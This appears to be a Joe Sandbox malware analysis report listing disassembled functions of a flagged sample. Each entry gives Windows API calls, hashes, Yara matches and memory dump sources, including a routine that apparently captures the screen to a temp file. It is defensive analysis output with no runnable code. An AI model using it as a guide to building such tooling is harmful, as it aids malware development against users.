                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                            • Instruction ID: 8ad3b3a3581a6c243f465d208097eb89db2971d21148e50bb9d0ce8cdb534b71
                                                                            • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                            • Instruction Fuzzy Hash: DAF0223A3443041FDB146F39DC82B7A7B96EF8072CF24442CFA06CB690D77199028B44
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,021C046A,?,00000004), ref: 021C546A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                            • Instruction ID: 8650d25b6f246f9ccdc01b71242c9dd93b055c88198d2e342dccb4a710c6bb6f
                                                                            • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                            • Instruction Fuzzy Hash: B9F0F635680318BFDB016F60DC01F6E7B22EF14B12F604019FD0576190DB719920EA89
                                                                            APIs
                                                                              • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                            • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                            • String ID:
                                                                            • API String ID: 1272433827-0
                                                                            • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                            • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                            • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                            • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                            APIs
                                                                              • Part of subcall function 021BE644: RtlEnterCriticalSection.NTDLL(01D40DA5), ref: 021BE653
                                                                            • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 021C505C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                            • String ID:
                                                                            • API String ID: 1272433827-0
                                                                            • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                            • Instruction ID: 3497a20005b63dfa7f443b84e5e5f9ec0e0962975453d9545c5bca1311484c60
                                                                            • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                            • Instruction Fuzzy Hash: FCF03C36A50304EFEB10EF68D905B8D77F1AF15721F10416AF904DB2A1C77599508F49
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                            • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                            • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                            • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,021CBC9B,021C0A0C,?,?,?,?,?,021C0A0C,?,?,?), ref: 021CB510
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                            • Instruction ID: cb4bdc7a0837e60b3c7e83301b66979460cadf382dfe4bd45e6c17777a294d62
                                                                            • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                            • Instruction Fuzzy Hash: C8F0553A34020457CB149F39DC0576ABF94EFC1B64F2A005DEF05CB240C3319942C790
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                            • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                            • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00410662,0219FE56), ref: 021A08C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                            • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                            • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                            • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                            • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                            • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                            • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                            • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                            • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                            • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                            • Opcode Fuzzy Hash: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                            • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                            • Instruction ID: 23a96cc3b666f5c9b091a7c26eafa17e17e0a861f3f0c94d5afbb01db56ef8c6
                                                                            • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                            • Instruction Fuzzy Hash: 3DD1C8331481A34EDB6F4A3984700BAFFF26E8216530E47ADE4F7CA5C2EB24D556D660
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                            • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                            • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                            • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                            • Instruction ID: 13053fe7ef43c13db1f333aaf855e8f210242301a91d07803dd671606f55e741
                                                                            • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                            • Instruction Fuzzy Hash: 0F6177716C06096ADF3F6A68B890BFE63B59F05B0DF14083AD882DB6C0D706D942CB56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction ID: caff1bdd32dd899b8f4258ad65e657b9875fad208f707f0335cc7e09fa9d3c73
                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                            • Instruction Fuzzy Hash: 0D11CB772C0042439E5BC62ED4B42F7A7BEEFC9A2872F827AD0414F758D722A145D600
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, Offset: 00708000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_708000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                            • Instruction ID: 00aea3bd102d9273ea51acacf3f796811e96e8dbe89d8c624e51512c1f2f19bd
                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                            • Instruction Fuzzy Hash: 46118E72340101EFEB54DF55DC81FA673EAEB88360B298165EE08CB356D67AEC01C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                            • Instruction ID: 7edcc2618ef8731cadc812347b6100da22b1b8442ccc8c3fde81e435e7621afa
                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                            • Instruction Fuzzy Hash: E101D676A506048FDF21CF24C814BAA33F9FB8A216F5544B9D90AD7381E774A941CB90
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                            • GetClientRect.USER32(?,?), ref: 00402140
                                                                            • GetDC.USER32(?), ref: 00402147
                                                                            • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                            • _wcslen.LIBCMT ref: 00402275
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                            • String ID: Tahoma
                                                                            • API String ID: 3832963559-3580928618
                                                                            • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                            • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                            • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                            • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                            APIs
                                                                            • DestroyWindow.USER32(?), ref: 004025C3
                                                                            • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                            • ReleaseCapture.USER32 ref: 004025E8
                                                                            • GetDC.USER32(00000000), ref: 0040260F
                                                                            • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                            • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                            • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                            • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                            • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                            • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                            • DeleteObject.GDI32(00000000), ref: 00402735
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                            • DestroyWindow.USER32(?), ref: 0040274A
                                                                            • SetCapture.USER32(?), ref: 00402797
                                                                            • GetDC.USER32(00000000), ref: 004027CB
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                            • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                            • DestroyWindow.USER32(?), ref: 00402803
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                            • String ID: hef
                                                                            • API String ID: 2545303185-98441221
                                                                            • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                            • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                            • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                            • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$Info
                                                                            • String ID:
                                                                            • API String ID: 2509303402-0
                                                                            • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                            • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                            • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                            • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$Info
                                                                            • String ID:
                                                                            • API String ID: 2509303402-0
                                                                            • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                            • Instruction ID: 045aaca0f0f12cd5f7d32bbcc8408944308f6ea7d45840278f157098296d8835
                                                                            • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                            • Instruction Fuzzy Hash: 29B1AC71D402099FDB229F78C880BEEBBF9BF08304F64456DE899A7251DB75A941CF60
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                              • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                            • _free.LIBCMT ref: 0043A621
                                                                              • Part of subcall function 0043345A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                              • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                            • _free.LIBCMT ref: 0043A643
                                                                            • _free.LIBCMT ref: 0043A658
                                                                            • _free.LIBCMT ref: 0043A663
                                                                            • _free.LIBCMT ref: 0043A685
                                                                            • _free.LIBCMT ref: 0043A698
                                                                            • _free.LIBCMT ref: 0043A6A6
                                                                            • _free.LIBCMT ref: 0043A6B1
                                                                            • _free.LIBCMT ref: 0043A6E9
                                                                            • _free.LIBCMT ref: 0043A6F0
                                                                            • _free.LIBCMT ref: 0043A70D
                                                                            • _free.LIBCMT ref: 0043A725
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                            • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                            • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                            • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 021CA893
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9BFF
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C11
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C23
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C35
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C47
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C59
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C6B
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C7D
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9C8F
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9CA1
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9CB3
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9CC5
                                                                              • Part of subcall function 021C9BE2: _free.LIBCMT ref: 021C9CD7
                                                                            • _free.LIBCMT ref: 021CA888
                                                                              • Part of subcall function 021C36C1: HeapFree.KERNEL32(00000000,00000000,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?), ref: 021C36D7
                                                                              • Part of subcall function 021C36C1: GetLastError.KERNEL32(?,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?,?), ref: 021C36E9
                                                                            • _free.LIBCMT ref: 021CA8AA
                                                                            • _free.LIBCMT ref: 021CA8BF
                                                                            • _free.LIBCMT ref: 021CA8CA
                                                                            • _free.LIBCMT ref: 021CA8EC
                                                                            • _free.LIBCMT ref: 021CA8FF
                                                                            • _free.LIBCMT ref: 021CA90D
                                                                            • _free.LIBCMT ref: 021CA918
                                                                            • _free.LIBCMT ref: 021CA950
                                                                            • _free.LIBCMT ref: 021CA957
                                                                            • _free.LIBCMT ref: 021CA974
                                                                            • _free.LIBCMT ref: 021CA98C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                            • Instruction ID: 6e24027f4f7bfb939d1863bf03ee68d778de5a15d7ee1db8cd9f3712226c2726
